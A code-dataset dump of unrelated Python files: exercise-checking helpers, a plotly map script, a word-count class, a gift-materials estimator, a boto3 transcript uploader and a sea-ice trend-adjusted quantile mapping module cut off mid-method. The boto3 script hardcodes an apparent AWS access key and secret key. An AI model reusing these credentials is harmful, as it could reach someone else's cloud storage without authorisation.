indent\n\nfrom littleutils import only\n\nfrom core.utils import format_exception_string, returns_stdout\n\n\nclass ExerciseError(Exception):\n pass\n\n\nclass InvalidInitialCode(Exception):\n pass\n\n\ndef make_function(program, function_template):\n arg_names = inspect.signature(function_template).parameters\n tree = ast.parse(program)\n try:\n for node, arg_name in zip(tree.body, arg_names):\n assert isinstance(node, ast.Assign)\n target = only(node.targets)\n assert isinstance(target, ast.Name)\n assert target.id == arg_name\n except AssertionError:\n raise ExerciseError(f\"\"\"\\\nYour code should start like this:\n\n{indented_inputs_string(dict.fromkeys(arg_names, \"...\"))}\n\"\"\")\n\n assignments = tree.body[:len(arg_names)]\n exercise = tree.body[len(arg_names):]\n tree.body = assignments\n code = compile(tree, \"\", \"exec\", dont_inherit=True)\n initial_names = {}\n try:\n exec(code, initial_names)\n except Exception as e:\n raise InvalidInitialCode from e\n del initial_names[\"__builtins__\"]\n\n tree.body = exercise\n code = compile(tree, \"\", \"exec\", dont_inherit=True)\n\n def func(**kwargs):\n exec(code, kwargs)\n\n return initial_names, func\n\n\ndef match_returns_stdout(func, solution):\n if getattr(solution, \"returns_stdout\", False):\n func = returns_stdout(func)\n return func\n\n\ndef clean_result(result):\n if not isinstance(result, str):\n result = repr(result)\n result = '\\n'.join(line.rstrip() for line in result.rstrip().splitlines())\n result = result or ''\n result = indent(result, ' ')\n return result\n\n\ndef indented_inputs_string(inputs):\n return indent(inputs_string(inputs), ' ')\n\n\ndef inputs_string(inputs):\n return '\\n'.join(f'{name} = {value!r}'\n for name, value in inputs.items())\n\n\ndef check_result(func, inputs, expected_result):\n try:\n result = func(**inputs)\n except Exception as e:\n result = format_exception_string()\n\n cleaned_result = clean_result(result)\n expected_result = clean_result(expected_result)\n\n if cleaned_result != expected_result:\n inputs.pop(\"stdin_input\", None)\n if inputs:\n message = f\"\"\"\\\nGiven these values:\n\n{indented_inputs_string(inputs)}\n\nyour code outputs:\"\"\"\n else:\n message = \"Your code outputs:\"\n\n message += f\"\"\"\n\n{cleaned_result}\n\nwhen it should output:\n\n{expected_result}\n\"\"\"\n raise ExerciseError(message)\n return result\n\n\ndef generate_string(length=None):\n if length is None:\n length = random.randrange(5, 11)\n return \"\".join(random.sample(string.ascii_letters, length))\n\n\ndef generate_list(typ):\n return [\n generate_for_type(typ)\n for _ in range(random.randrange(5, 11))\n ]\n\n\ndef generate_for_type(typ):\n if isinstance(typ, typing._GenericAlias):\n if typ.__origin__ is list:\n return generate_list(only(typ.__args__))\n return {\n str: generate_string(),\n bool: random.choice([True, False]),\n int: random.randrange(100),\n }[typ]\n\n\n# This function is shown to the user, keep it simple\ndef assert_equal(actual, expected):\n if actual == expected:\n print(\"OK\")\n else:\n print(f\"Error! {repr(actual)} != {repr(expected)}\")\n","sub_path":"core/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496447491","text":"\"\"\"\nPlots each collection on a separate map.\n\"\"\"\n\nimport numpy as np \nimport pandas as pd\nimport plotly\nimport plotly.graph_objects as go\nimport pymongo\n\n# I make collections a list because my program will loop through each one,\n# opening each map in a new browser tab.\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"armageddon\"]\ncollections = [db[\"airports\"], db[\"cities\"], db[\"earthquakes\"], \n db[\"volcanos\"], db[\"meteorites\"], db[\"ufos\"]]\n\n# Filename and marker color need to change with the collection being mapped\nnames = [\"airports\", \"cities\", \"earthquakes\", \"volcanos\", \n \"meteorites\", \"ufos\"]\ncolor = [\"green\", \"violet\", \"orange\", \"yellow\", \"red\", \"blue\"]\nindex = 0\n\n# I will provide my token on request\ntoken = token = open(r\"mapbox_token.txt\").read()\n\n\n\nlat = []\nlon = []\n\nfor collection in collections:\n for obj in collection.find():\n lat.append(obj[\"latitude\"])\n lon.append(obj[\"longitude\"])\n\n fig = go.Figure(go.Scattermapbox(\n lat = lat,\n lon = lon,\n mode = 'markers',\n marker=go.scattermapbox.Marker(size=9, color = color[index])\n ))\n\n\n\n fig.update_layout(\n autosize=True,\n hovermode='closest',\n mapbox=go.layout.Mapbox(\n accesstoken=token,\n bearing=0,\n center=go.layout.mapbox.Center(\n lat=33.930828,\n lon=-98.484879\n ),\n pitch=0,\n zoom=3\n ))\n\n plotly.offline.plot(fig, filename= names[index] +\".html\")\n index += 1\n lat.clear()\n lon.clear()\n","sub_path":"A07/plotALLmapsSeparately.py","file_name":"plotALLmapsSeparately.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599233217","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport codecs\nimport collections\nfrom functools import cmp_to_key\nimport json\nimport logging\n\nimport json_utils\nimport os\nimport numpy as np\n\n\n__all__ = ['OOV_TOK', 'SOS_TOK', 'EOS_TOK', 'WordCount']\n\n# general language modeling tokens\nOOV_TOK = ''\nSOS_TOK = ''\nEOS_TOK = ''\n\n'''Word Count'''\n\n\nclass WordCount(object):\n def __init__(self, counter=None):\n self._counter = collections.Counter() if counter is None else counter\n\n ''' Build in functions '''\n\n def __len__(self):\n return len(self._counter)\n\n def __contains__(self, item):\n return item in self._counter\n\n def __str__(self):\n return u'\\n'.join(map(lambda word_wid: u'{}\\t{}'.format(word_wid[0], word_wid[1]), self.ordered_tuples()))\n\n ''' Accumulation '''\n\n def observe(self, word, occurrences=1):\n \"\"\"\n Observe a word occurring so many times\n :param word:\n :param occurrences:\n :return:\n :type word: tr\n :type occurrences: int\n :rtype: None\n \"\"\"\n try:\n self._counter[word] += occurrences\n except:\n print (\"word:\",word,\"occurrences:\",occurrences)\n assert 1 == 2\n\n def update(self, other):\n #print ('WordCount.update other: {}'.format(type(other)))\n if isinstance(other, WordCount):\n self._counter.update(other._counter)\n else:\n self._counter.update(other)\n #print (\"_counter after update: \"+self._counter.__str__())\n\n ''' Getters '''\n\n def get_count(self, token):\n \"\"\"\n Get the count for a token\n :param token:\n :return:\n :type token: str\n :rtype: int\n \"\"\"\n\n return self._counter[token]\n\n def check_count(self, token):\n \"\"\"\n Get the count for a token\n :param token:\n :return:\n :type token: str\n :rtype: int\n \"\"\"\n \n try:\n return self._counter[token]\n except:\n return 0\n\n def total_observations(self):\n \"\"\"\n Get the sum of all observations\n :return:\n :rtype: int\n \"\"\"\n return sum(self._counter.values())\n\n def ordered_counts(self):\n \"\"\"\n Get the counts only in descending order\n :return:\n \"\"\"\n return sorted(self._counter.values(), key=lambda c: -c)\n\n @staticmethod\n def _wc_cmp(first, second):\n \"\"\"\n 1. Descending by count\n 2. Ascending by token\n\n :param first:\n :param second:\n :return:\n \"\"\"\n count_cmp = cmp_to_key(first[1], second[1])\n if count_cmp != 0:\n return -count_cmp\n return WordCount._wc_cmp(first[0], second[0])\n\n def ordered_tuples(self):\n \"\"\"\n Return a list of tuples (word, frequency) in descending order of frequency. (most frequent at top)\n ALSO this maintains the order of items with equal frequency, which is a requirement for deriving vocabularies.\n :return:\n :rtype: list\n \"\"\"\n first_sorted = sorted(self._counter.items())\n return sorted(first_sorted, key=lambda x : x[1], reverse=True)\n\n ''' Filtering '''\n\n def imposeMinCount(self, count, add_UNK=False):\n if count < 2 and not add_UNK:\n return self\n\n ordered_tuples = self.ordered_tuples()\n origLastSmall = lastSmall = -1 + len(ordered_tuples)\n while lastSmall >= 1 and ordered_tuples[lastSmall][1] < count:\n lastSmall -= 1\n\n new_count = collections.Counter()\n new_count.update(dict(ordered_tuples[:lastSmall])) \n oovCnt = sum((t[1] for t in ordered_tuples[lastSmall:]))\n if add_UNK and oovCnt < 1 and OOV_TOK not in new_count:\n oovCount = count\n new_count[OOV_TOK] += oovCnt\n\n logging.getLogger('Vocabulary').warn('Elminating {} of the {} tokens with count less than {}. OOV_TOK: sum {} tokens'.format((origLastSmall-lastSmall), len(ordered_tuples), count, new_count[OOV_TOK]) )\n\n return WordCount(new_count)\n\n def trim(self, size):\n \"\"\"\n Trim this word count object to a particular size, placing the sum of the remaining counts in the UNK token\n :param size:\n :return:\n\n :type size: int\n :rtype: WordCount\n \"\"\"\n ordered_tuples = self.ordered_tuples()\n if size >= len(ordered_tuples):\n return self\n new_count = collections.Counter()\n new_count.update(dict(ordered_tuples[:size]))\n new_count[OOV_TOK] += sum((t[1] for t in ordered_tuples[size:]))\n\n return WordCount(new_count)\n\n def filter(self, filter_fun):\n \"\"\"\n Return a new WorCount with only tuples which match the filter. The sum of the remaining counts\n are placed under the UNK token.\n :param filter_fun: function which takes word and count e.g. lambda w, c: c > 10\n :return:\n\n :type filter_fun: callable\n :rtype: WordCount\n \"\"\"\n print (\"filter\")\n new_tuples = []\n unk_sum = 0\n for word, count in self._counter.items():\n if filter_fun(word, count):\n new_tuples.append((word, count))\n else:\n # LOGGER.info('UNK\\t%s\\t%d', word, count)\n unk_sum += count\n\n new_count = collections.Counter()\n new_count.update(dict(new_tuples))\n new_count[OOV_TOK] += unk_sum\n\n return WordCount(new_count)\n\n ''' Serialization '''\n\n def save(self, file_path):\n if file_path.endswith('.txt'):\n with codecs.open(file_path, 'w', 'utf8') as fp:\n fp.write(self.__str__())\n elif file_path.endswith('.json'):\n with codecs.open(file_path, 'w', 'utf8') as fp:\n json.dump(self.ordered_tuples(), fp)\n else:\n with open(file_path, 'wb') as fp:\n pickle.dump(self._counter, fp)\n\n @staticmethod\n def load(file_path, skip_tokens=[]):\n if file_path.endswith('.txt'):\n if len(skip_tokens): raise NotImplementedError\n wc = WordCount()\n with codecs.open(file_path, 'r', 'utf8') as fp:\n for line in fp:\n if not line.strip():\n continue\n try:\n w, c = line.split('\\t')\n except:\n raise ValueError('Failed to unpack line \"{}\"'.format(line))\n wc.observe(w, int(c))\n return wc\n elif file_path.endswith('.json'):\n skip = set(skip_tokens)\n wc = WordCount() \n with codecs.open(file_path, 'r', 'utf8') as fp:\n for w, c in json.load(fp):\n if w not in skip:\n wc.observe(w, c)\n return wc\n else:\n if len(skip_tokens): raise NotImplementedError\n wc = WordCount()\n with open(file_path, 'rb') as fp:\n wc._counter = pickle.load(fp)\n return wc\n","sub_path":"mm_dataset/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"231593898","text":"import re\nimport random\n\n\n# classes for child gift, and materials\n\n\nclass Child:\n UUID = '1234AV'\n name = 'Alex NewFolder'\n\n class Adress:\n Country = 'Romania'\n City = 'Galati'\n street = 'Strada Vietii'\n number = '420'\n\n gifts = []\n\n\nclass Gift:\n def __init__(self, obj, quantity, adjectives, uid):\n self.obj = obj\n self.quantity = quantity\n self.adjectives = adjectives\n self.UID = uid\n\n\nclass Materials:\n plastic = 0\n glass = 0\n textile = 0\n iron = 0\n aluminium = 0\n copper = 0\n gold = 0\n silver = 0\n wood = 0\n porcelain = 0\n rubber = 0\n paper = 0\n groceries = 0\n\n\n# lists with keywords for searching specific gifts\nelectronics = ['huawei', 'iphone', 'xiaomi', 'samsung', 'nintendo', 'xbox', 'smartphone', 'console', 'phone', 'tablet',\n 'oral-b', 'amd', 'nvidia', 'computer', 'laptop', 'tv', 'monitor', 'keyboard', 'microphone', 'headphones',\n 'camera', 'electronic', 'kindle', 'smart', 'robot', 'earphones', 'buds']\nfood = ['cheese', 'candy', 'fruit', 'chocolate', 'wafers']\ntextiles = ['pants', 'shirt', 't-shirt', 'dress', 'shorts', 'sandals', 'shoes', 'stiletto', 'wig', 'scarf', 'backpack',\n 'handbag', 'pillow', 'blanket', 'slippers', 'hoodie', 'hat', 'sweater', 'jeans', 'plush', 'nike', 'dior',\n 'burlon', 'balenciaga', 'adidas', 'versace', 'jordan', 'prada', 'gucci', 'kors', 'chanel', 'lv', 'moschino',\n 'zara', 'reserved', 'skirt']\npaper = ['poster', 'book', 'giftcard']\n\n# initializing child and materials\nMalumaLaurentiu = Child()\nMatL = Materials()\n\n# random input for testing the code\nMalumaLaurentiu.gifts.append(Gift(\"zee beez zing toy\", \"1\", \"khaki\", \"1234AV\"))\nMalumaLaurentiu.gifts.append(Gift(\"Huawei Media Pad T2 7\", \"1\", \"\", \"1234AV\"))\n# checking the keywords, first for the object and if that fails for the material -- if that also fails we're making it\n# a plastic toy, all values are assigned randomly for variation\nfor i in MalumaLaurentiu.gifts:\n declassified = 0\n toy = re.split(\" \", i.obj)\n for j in toy:\n if j.lower() in electronics:\n declassified = 1\n qtt = random.randrange(10, 18)\n qtt *= int(i.quantity)\n MatL.copper += qtt\n qtt = round(random.uniform(0.01, 1), 2)\n qtt *= int(i.quantity)\n MatL.gold = round(MatL.gold + qtt, 2)\n qtt = round(random.uniform(0.3, 0.6), 2)\n qtt *= int(i.quantity)\n MatL.silver = round(MatL.silver + qtt, 2)\n qtt = random.randrange(100, 500)\n qtt *= int(i.quantity)\n MatL.plastic += qtt\n qtt = random.randrange(10, 50)\n qtt *= int(i.quantity)\n MatL.glass += qtt\n qtt = round(random.uniform(10, 60), 2)\n qtt *= int(i.quantity)\n MatL.iron = round(MatL.iron + qtt, 2)\n break\n elif j.lower() in food:\n declassified = 1\n qtt = random.randrange(500, 2000)\n qtt *= int(i.quantity)\n MatL.groceries += qtt\n break\n elif j.lower() in textiles:\n declassified = 1\n qtt = random.randrange(250, 1000)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n break\n elif j.lower() in paper:\n declassified = 1\n qtt = random.randrange(25, 250)\n qtt *= int(i.quantity)\n MatL.paper += qtt\n break\n elif j.lower() == 'bike' or j.lower() == 'bicycle':\n declassified = 1\n qtt = round(random.uniform(1000, 5000), 2)\n qtt *= int(i.quantity)\n MatL.aluminium = round(MatL.aluminium + qtt, 2)\n qtt = round(random.uniform(500, 750), 2)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n qtt = random.randrange(250, 500)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n break\n elif j.lower() == 'doll':\n declassified = 1\n qtt = random.randrange(10, 20)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n qtt = random.randrange(100, 250)\n qtt *= int(i.quantity)\n MatL.plastic += qtt\n break\n elif j.lower() == 'skateboard' or j.lower() == 'skate':\n declassified = 1\n qtt = random.randrange(450, 900)\n qtt *= int(i.quantity)\n MatL.wood += qtt\n qtt = round(random.uniform(100, 250), 2)\n qtt *= int(i.quantity)\n MatL.iron = round(MatL.iron + qtt, 2)\n qtt = round(random.uniform(100, 150), 2)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n break\n if declassified == 0:\n adj = re.split(\" \", i.adjectives)\n for j in adj:\n if j == 'copper':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.copper += qtt\n break\n elif j == 'golden':\n declassified = 1\n qtt = random.randrange(5, 200)\n qtt *= int(i.quantity)\n MatL.gold = round(MatL.gold + qtt, 2)\n break\n elif j == 'silver':\n declassified = 1\n qtt = random.randrange(5, 300)\n qtt *= int(i.quantity)\n MatL.silver = round(MatL.silver + qtt, 2)\n break\n elif j == 'aluminium':\n declassified = 1\n qtt = random.randrange(100, 500)\n qtt *= int(i.quantity)\n MatL.aluminium = round(MatL.aluminium + qtt, 2)\n break\n elif j == 'glass':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.glass = round(MatL.glass + qtt, 2)\n break\n elif j == 'porcelain':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.porcelain = round(MatL.porcelain + qtt, 2)\n break\n elif j == 'rubber':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n break\n elif j == 'wooden':\n declassified = 1\n qtt = random.randrange(200, 1000)\n qtt *= int(i.quantity)\n MatL.wood = round(MatL.wood + qtt, 2)\n break\n if declassified == 0:\n qtt = random.randrange(200, 600)\n qtt *= int(i.quantity)\n MatL.plastic += qtt\n\n# random print to check the values\nprint(MatL.plastic, MatL.glass, MatL.textile, MatL.iron, MatL.aluminium, MatL.copper, MatL.gold, MatL.silver, MatL.wood,\n MatL.porcelain, MatL.rubber, MatL.paper, MatL.groceries)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"235148154","text":"\n#! pip install boto3\nimport boto3\nimport os\n\nimport pandas as pd\nimport re\n\nsession = boto3.Session(aws_access_key_id = 'AKIATJJR2V5VZLS2FLF7', aws_secret_access_key = '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')\ns3 = session.resource('s3')\nbucket = s3.Bucket('s3grouparmenia')\n\nfor file in bucket.objects.all():\n if file.key.endswith('.txt'):\n print(file.key)\n break\n\ntranscripts = []\nyears = []\ncountries = []\nsessions = []\nyears_cleaned = []\n\nfor file in bucket.objects.all():\n if file.key.startswith('data/Converted sessions'):\n name = str(file.key)\n if name.endswith('.txt'):\n years.append(name.split('_')[-1])\n sessions.append(name.split('_')[1])\n countries.append(name.split('_')[0][-3:])\n obj = file.get()['Body'].read()\n transcripts.append(obj)\n\nfor year in years:\n years_cleaned.append(year.replace('.txt', ''))\n\ndic = {\n 'Year': years_cleaned,\n 'Session': sessions,\n 'Country': countries,\n 'Transcript': transcripts\n}\n\ndf = pd.DataFrame(dic)\ndf.head()\n\ni = df.loc[df.Year == 'Store-to-UTF-8'].index\ndf.drop(i, inplace = True)\ndf.reset_index\ndf.info()\n\ndf.head()\n\ndf.to_csv('consolidated_transcripts.csv')\nbucket.upload_file(Filename = 'consolidated_transcripts.csv', Key = 'consolidated_transcripts.csv')\n\n","sub_path":"final_project_mda/codes/notebook/consolidating_transcripts.py","file_name":"consolidating_transcripts.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399905011","text":"# -*- coding: utf-8 -*-\n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import beta, linregress\nimport numpy as np\nfrom beinf import beinf\n\nclass taqm():\n '''\n Contains the methods needed for performing trend-adjusted quantile mapping (TAQM).\n It relies on the methods from the :class:`beinf` class.\n \n Methods Summary:\n ----------------\n\n ``calibrate(x_params,y_params,x_t_params,X,Y,X_t,trust_sharp_fcst=False)`` \n calibrated forecast BEINF parameters and calibrated forecast ensemble\n \n ``fit_data(X,Y,X_t)`` \n BEINF parameters for the TAMH, TAOH, and the raw forecast\n \n ``lin(a1,b1,T)`` \n linear equation values\n \n ``piecewise_lin(a1,b1,a2,b2,t_b,T)`` \n piece-wise linear equation values\n\n ``trend_adjust_1p(data_all,tau_t,t)`` \n trend-adjusted values using a single period\n \n ``trend_adjust_2p(data_all,tau_t,t,t_b=1999)`` \n trend-adjusted values using two periods\n \n ``unpack_params(array)``\n the individual parameters stored in array\n \n '''\n\n def lin(self,a1,b1,T):\n r\"\"\"Evaluates the piece-wise linear equation\n \n .. math:: \n z = a_1 T + b_1 \n :label: pw1\n \n at :math:`T`.\n \n Args:\n a1 (float):\n The slope in :eq:`pw1`.\n \n b1 (float):\n The z-intercept in\n :eq:`pw1`.\n \n t_b (float):\n The breakpoint for :math:`z` in :eq:`pw1`.\n \n T (float or ndarray):\n The point(s) at which :eq:`pw1` is evaluated.\n\n Returns: z (float or ndarray):\n The value of :eq:`pw1` at each point T. Values \n less than 0 and greater than 1\n are clipped to 0 and 1, respectively.\n \"\"\"\n\n #Linear equation\n z = a1*T + b1 \n #don't allow for sic values less than zero or greater than 1\n if np.any(z<0.0):\n if isinstance(z,np.float64):\n z = 0.0\n else:\n z[z<0.0] = 0.0\n \n if np.any(z>1.0):\n if isinstance(z,np.float64):\n z = 1.0 \n else:\n z[z>1.0] = 1.0\n \n return z\n\n def piecewise_lin(self,a1,b1,a2,b2,t_b,T):\n r\"\"\"Evaluates the piece-wise linear equation\n \n .. math:: \n z = \\begin{cases} \n a_1 T + b_1, & Tt_b\n \\end{cases} \n :label: pw2\n \n at :math:`T`.\n \n Args:\n a1, a2 (floats):\n The slopes in :eq:`pw2`.\n \n b1, b2 (floats):\n The z-intercepts in\n :eq:`pw2`.\n \n t_b (float):\n The breakpoint for :math:`z` in :eq:`pw2`.\n \n T (float or ndarray):\n The point(s) at which :eq:`pw2` is evaluated.\n\n Returns: z (float or ndarray):\n The value of :eq:`pw2` at each point T. Values \n less than 0 and greater than 1\n are clipped to 0 and 1, respectively.\n \"\"\"\n if isinstance(T,np.ndarray):\n #If T is an, z and T are arrays\n z = np.zeros(T.shape)\n z[T=t_b] = a2*T[T>=t_b] + b2\n else:\n #If for a single year T and y are single value integers or floats\n if T1.0):\n if isinstance(z,np.float64):\n z = 1.0 \n else:\n z[z>1.0] = 1.0\n \n return z \n\n def trend_adjust_1p(self,data_all,tau_t,t):\n \"\"\"Linearly detrend data_all and re-center about its\n linear least squares fit evaluated at \n :math:`T=t`. One may want to use\n this trend adjustment over :func:`~taqm.trend_adjust_2p` \n if the hindcast record is over the more recent record.\n \n Args:\n data_all (ndarray):\n A time series of size N, or an ensemble time series of size NxM,\n where M is the number of ensemble members.\n \n tau_t (ndarray):\n All hindcast years exluding the forecast year.\n\n t (float):\n The forecast year.\n \n Returns: data_ta (ndarray):\n Trend-adjusted values with same shape as data_all.\n \"\"\"\n if np.ndim(data_all)>1:\n # If data_all is shape N by M, take mean across axis M observations (ensemble mean) \n # for subsequent calculation of the linear least squares solution\n data = np.mean(data_all,axis=1)\n else:\n data = np.copy(data_all) \n \n \n if np.all(data_all==0.0) or np.all(data_all==1.0):\n # If all values in data_all are either 0 or 1,\n # no trend adjustment is needed\n data_ta = np.copy(data_all)\n\n else:\n \n #compute least squares paramaters\n m, b = linregress(tau_t,data)[:2]\n \n #non-stationary mean for year t \n z_tilde_nsm = self.lin(m,b,t)\n \n if z_tilde_nsm<0.0:\n z_tilde_nsm = 0.0\n if z_tilde_nsm>1.0:\n z_tilde_nsm = 1.0\n \n #detrend data and re-center\n if np.ndim(data_all)>1:\n data_d = data_all - self.lin(m,b,tau_t)[:,np.newaxis] \n data_ta = data_d + z_tilde_nsm\n else:\n data_d = data_all - self.lin(m,b,tau_t)\n data_ta = data_d + z_tilde_nsm\n \n #change values below zero (above one) to zero (one)\n data_ta[data_ta<0.0] = 0.0\n data_ta[data_ta>1.0] = 1.0 \n \n return data_ta\n\n def trend_adjust_2p(self,data_all,tau_t,t,t_b=1999):\n \"\"\"Piece-wise linearly detrend data_all and re-center it about its\n non-linear least squares fit to Eq. :eq:`pw2` evaluated at \n :math:`T=` `t`. This method carries\n out the trend-adjustment technique described in section 5a\n of Dirkson et al, 2018. The non-linear least squares fit constrains\n Eq. :eq:`pw2` to be continuous at :math:`T=t_b`.\n \n Args:\n data_all (ndarray):\n A time series of size N, or an ensemble time series of size NxM,\n where M is the number of ensemble members.\n \n tau_t (ndarray):\n All hindcast years exluding the forecast year `t`.\n\n t (float):\n The forecast year.\n \n t_b (float):\n The breakpoint year in Eq. :eq:`pw2`.\n \n Returns: data_ta (ndarray):\n Trend-adjusted values with same shape as data_all.\n \"\"\"\n if np.ndim(data_all)>1:\n # If data_all is shape N by M, take mean across axis M observations (ensemble mean) \n # for subsequent calculation of the linear least squares solution\n data = np.mean(data_all,axis=1)\n else:\n data = np.copy(data_all) \n \n \n if np.all(data_all==0.0) or np.all(data_all==1.0):\n # If all values in data_all are either 0 or 1,\n # no trend adjustment is needed\n data_ta = np.copy(data_all)\n\n else:\n # else, compute non-linear least squares \n # parameters of the piece-wise equation\n # and recenter data_all about this solution evaluated \n # at time=year \n def piecewise_regress(T,z):\n # function for computing least squares parameters\n def f_min(T,a1,b1,a2):\n # function for the piecewise linear equation\n # with continuity at yr_bp\n z_tilde = np.zeros(len(T))\n z_tilde[T<=t_b] = a1*T[T<=t_b] + b1\n z_tilde[T>t_b] = a2*T[T>t_b] + (a1-a2)*t_b + b1\n return z_tilde\n \n popt, pcov = curve_fit(f_min,T,z,p0=[1,1,1])\n a1,b1,a2 = popt\n b2 = (a1-a2)*t_b + b1\n \n return a1,b1,a2,b2\n \n #compute least squares paramaters\n a1, b1, a2, b2 = piecewise_regress(tau_t,data)\n \n #non-stationary mean for year t \n z_tilde_nsm = self.piecewise_lin(a1,b1,a2,b2,t_b,t)\n \n if z_tilde_nsm<0.0:\n z_tilde_nsm = 0.0\n if z_tilde_nsm>1.0:\n z_tilde_nsm = 1.0\n \n #detrend data and re-center\n if np.ndim(data_all)>1:\n data_d = data_all - self.piecewise_lin(a1,b1,a2,b2,t_b,tau_t)[:,np.newaxis] \n data_ta = data_d + z_tilde_nsm\n else:\n data_d = data_all - self.piecewise_lin(a1,b1,a2,b2,t_b,tau_t)\n data_ta = data_d + z_tilde_nsm\n \n #change values below zero (above one) to zero (one)\n data_ta[data_ta<0.0] = 0.0\n data_ta[data_ta>1.0] = 1.0 \n \n return data_ta\n \n def fit_params(self,X,Y,X_t):\n '''\n Fits X (the TAMH ensemble time series), Y (the TAOH time series), and X_t (the raw forecast ensemble) to the BEINF\n distribution. This method carries out the fiting procedure described in \n section 5b of Dirkson et al, 2018.\n \n Args:\n X (ndarray):\n The TAMH ensemble time series of size NxM.\n \n Y (ndarray):\n The TAOH time series of size N.\n \n X_t (ndarray):\n The raw forecast ensemble of size M.\n \n Returns: x_params (ndarray), y_params (ndarray), x_t_params (ndarray):\n The shape parameters :math:`a`,\n :math:`b`, :math:`p`, :math:`q`\n for the BEINF distribution fitted to each \n X, Y, and X_t (see :meth:`beinf.fit`). \n '''\n #Fit TAMH to the beinf distribution\n a_x, b_x, p_x, q_x = beinf.fit(X.flatten()) \n x_params = np.array([a_x, b_x, p_x, q_x])\n\n #fit TAOH to the beinf distribution\n a_y, b_y, p_y, q_y = beinf.fit(Y) \n y_params = np.array([a_y, b_y, p_y, q_y])\n\n #fit forecast to the beinf distribution\n a_x_t, b_x_t, p_x_t, q_x_t = beinf.fit(X_t)\n #store parameters in an array\n x_t_params = np.array([a_x_t, b_x_t, p_x_t, q_x_t])\n \n return x_params, y_params, x_t_params\n\n\n def calibrate(self,x_params,y_params,x_t_params,X,Y,X_t,trust_sharp_fcst=False):\n r'''\n Calibrates the raw forecast BEINF paramaters :math:`a_{x_t}`,\n :math:`b_{x_t}`, :math:`p_{x_t}` and :math:`q_{x_t}`. This method \n carries out the calibration step described in section 5c in Dirkson et al, 2018.\n \n Args:\n x_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the TAMH ensemble time series.\n\n y_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the TAOH time series.\n \n x_t_params (ndarray):\n An array containing the four parameters of the BEINF distribution\n for the raw forecast ensemble.\n \n trust_sharp_fcst (boolean, optional):\n `True` to revert to the raw forecast when \n :math:`p_{x_t}=1`. `False` \n to revert to the TAOH distribution when :math:`p_{x_t}=1`.\n \n Returns: x_t_cal_params (ndarray), X_t_cal_beta (ndarray):\n x_t_cal_params contains the four BEINF\n distribution parameters for the calibrated forecast: :math:`a_{\\hat{x}_t}`, :math:`b_{\\hat{x}_t}`, \n :math:`p_{\\hat{x}_t}` and :math:`q_{\\hat{x}_t}`. When :math:`a_{\\hat{x}_t}` and :math:`b_{\\hat{x}_t}`\n could not be fit, they are returned as :code:`a=np.inf` and :code:`b=np.inf`.\n \n X_t_cal_beta contains the calibrated forecast ensemble (np.inf replaces replace 0's and 1's in the \n ensemble). This array contains all :code:`np.inf` values when any of :math:`p_y=1`,\n :math:`p_x=1`, or :math:`p_{x_t}=1`, or when all parameters in x_t_cal_params are defined (none are equal to :code:`np.inf`).\n \n '''\n \n a_x, b_x, p_x, q_x = x_params[0], x_params[1], x_params[2], x_params[3]\n a_y, b_y, p_y, q_y = y_params[0], y_params[1], y_params[2], y_params[3]\n a_x_t, b_x_t, p_x_t, q_x_t = x_t_params[0], x_t_params[1], x_t_params[2], x_t_params[3]\n \n #function to avoid returning nan when dividing by zero\n def safediv(numerator,denominator):\n if denominator==0.0:\n return 0.0\n else:\n return numerator/denominator \n \n #calibrate forecast parameters\n if p_y==1.0 or p_x==1.0 or p_x_t==1.0:\n # if any of TAMH, TAOH, or the forecast are entirely\n # comprised of zeros and ones, calibration cannot be done.\n # choices are: \n if np.logical_and(p_x_t==1.0,trust_sharp_fcst==True):\n # trust the raw forecast values when they are perfectly sharp\n a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal = np.copy(a_x_t), np.copy(b_x_t), np.copy(p_x_t), np.copy(q_x_t) \n else:\n # trust TAOH\n a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal = np.copy(a_y), np.copy(b_y), np.copy(p_y), np.copy(q_y)\n #in this case, there are no \"beta\" claibrated forecast values\n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else:\n #calibrate the bernoulli portion of the beinf forecast distribution\n p_x_t_cal = max(min(p_x_t + p_y - p_x,1.),0.) \n num = max(min(p_x_t*q_x_t + p_y*q_y - p_x*q_x,1.),0.)\n den = np.copy(p_x_t_cal)\n q_x_t_cal = max(min(safediv(num,den),1.),0.) \n\n if p_x_t_cal==1.0:\n # if the calibration of p and q result in p=1 then there\n # should be no \"beta\" calibrated forecast values\n a_x_t_cal,b_x_t_cal = np.inf, np.inf\n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else: \n # Get the values from the forecast ensmeble TAMH, and \n # TAOH that are between zero and one\n X_t_beta = np.copy(X_t[np.logical_and(X_t!=0.0,X_t!=1.0)]) \n X_beta = X[np.logical_and(X!=0.0,X!=1.0)].flatten()\n 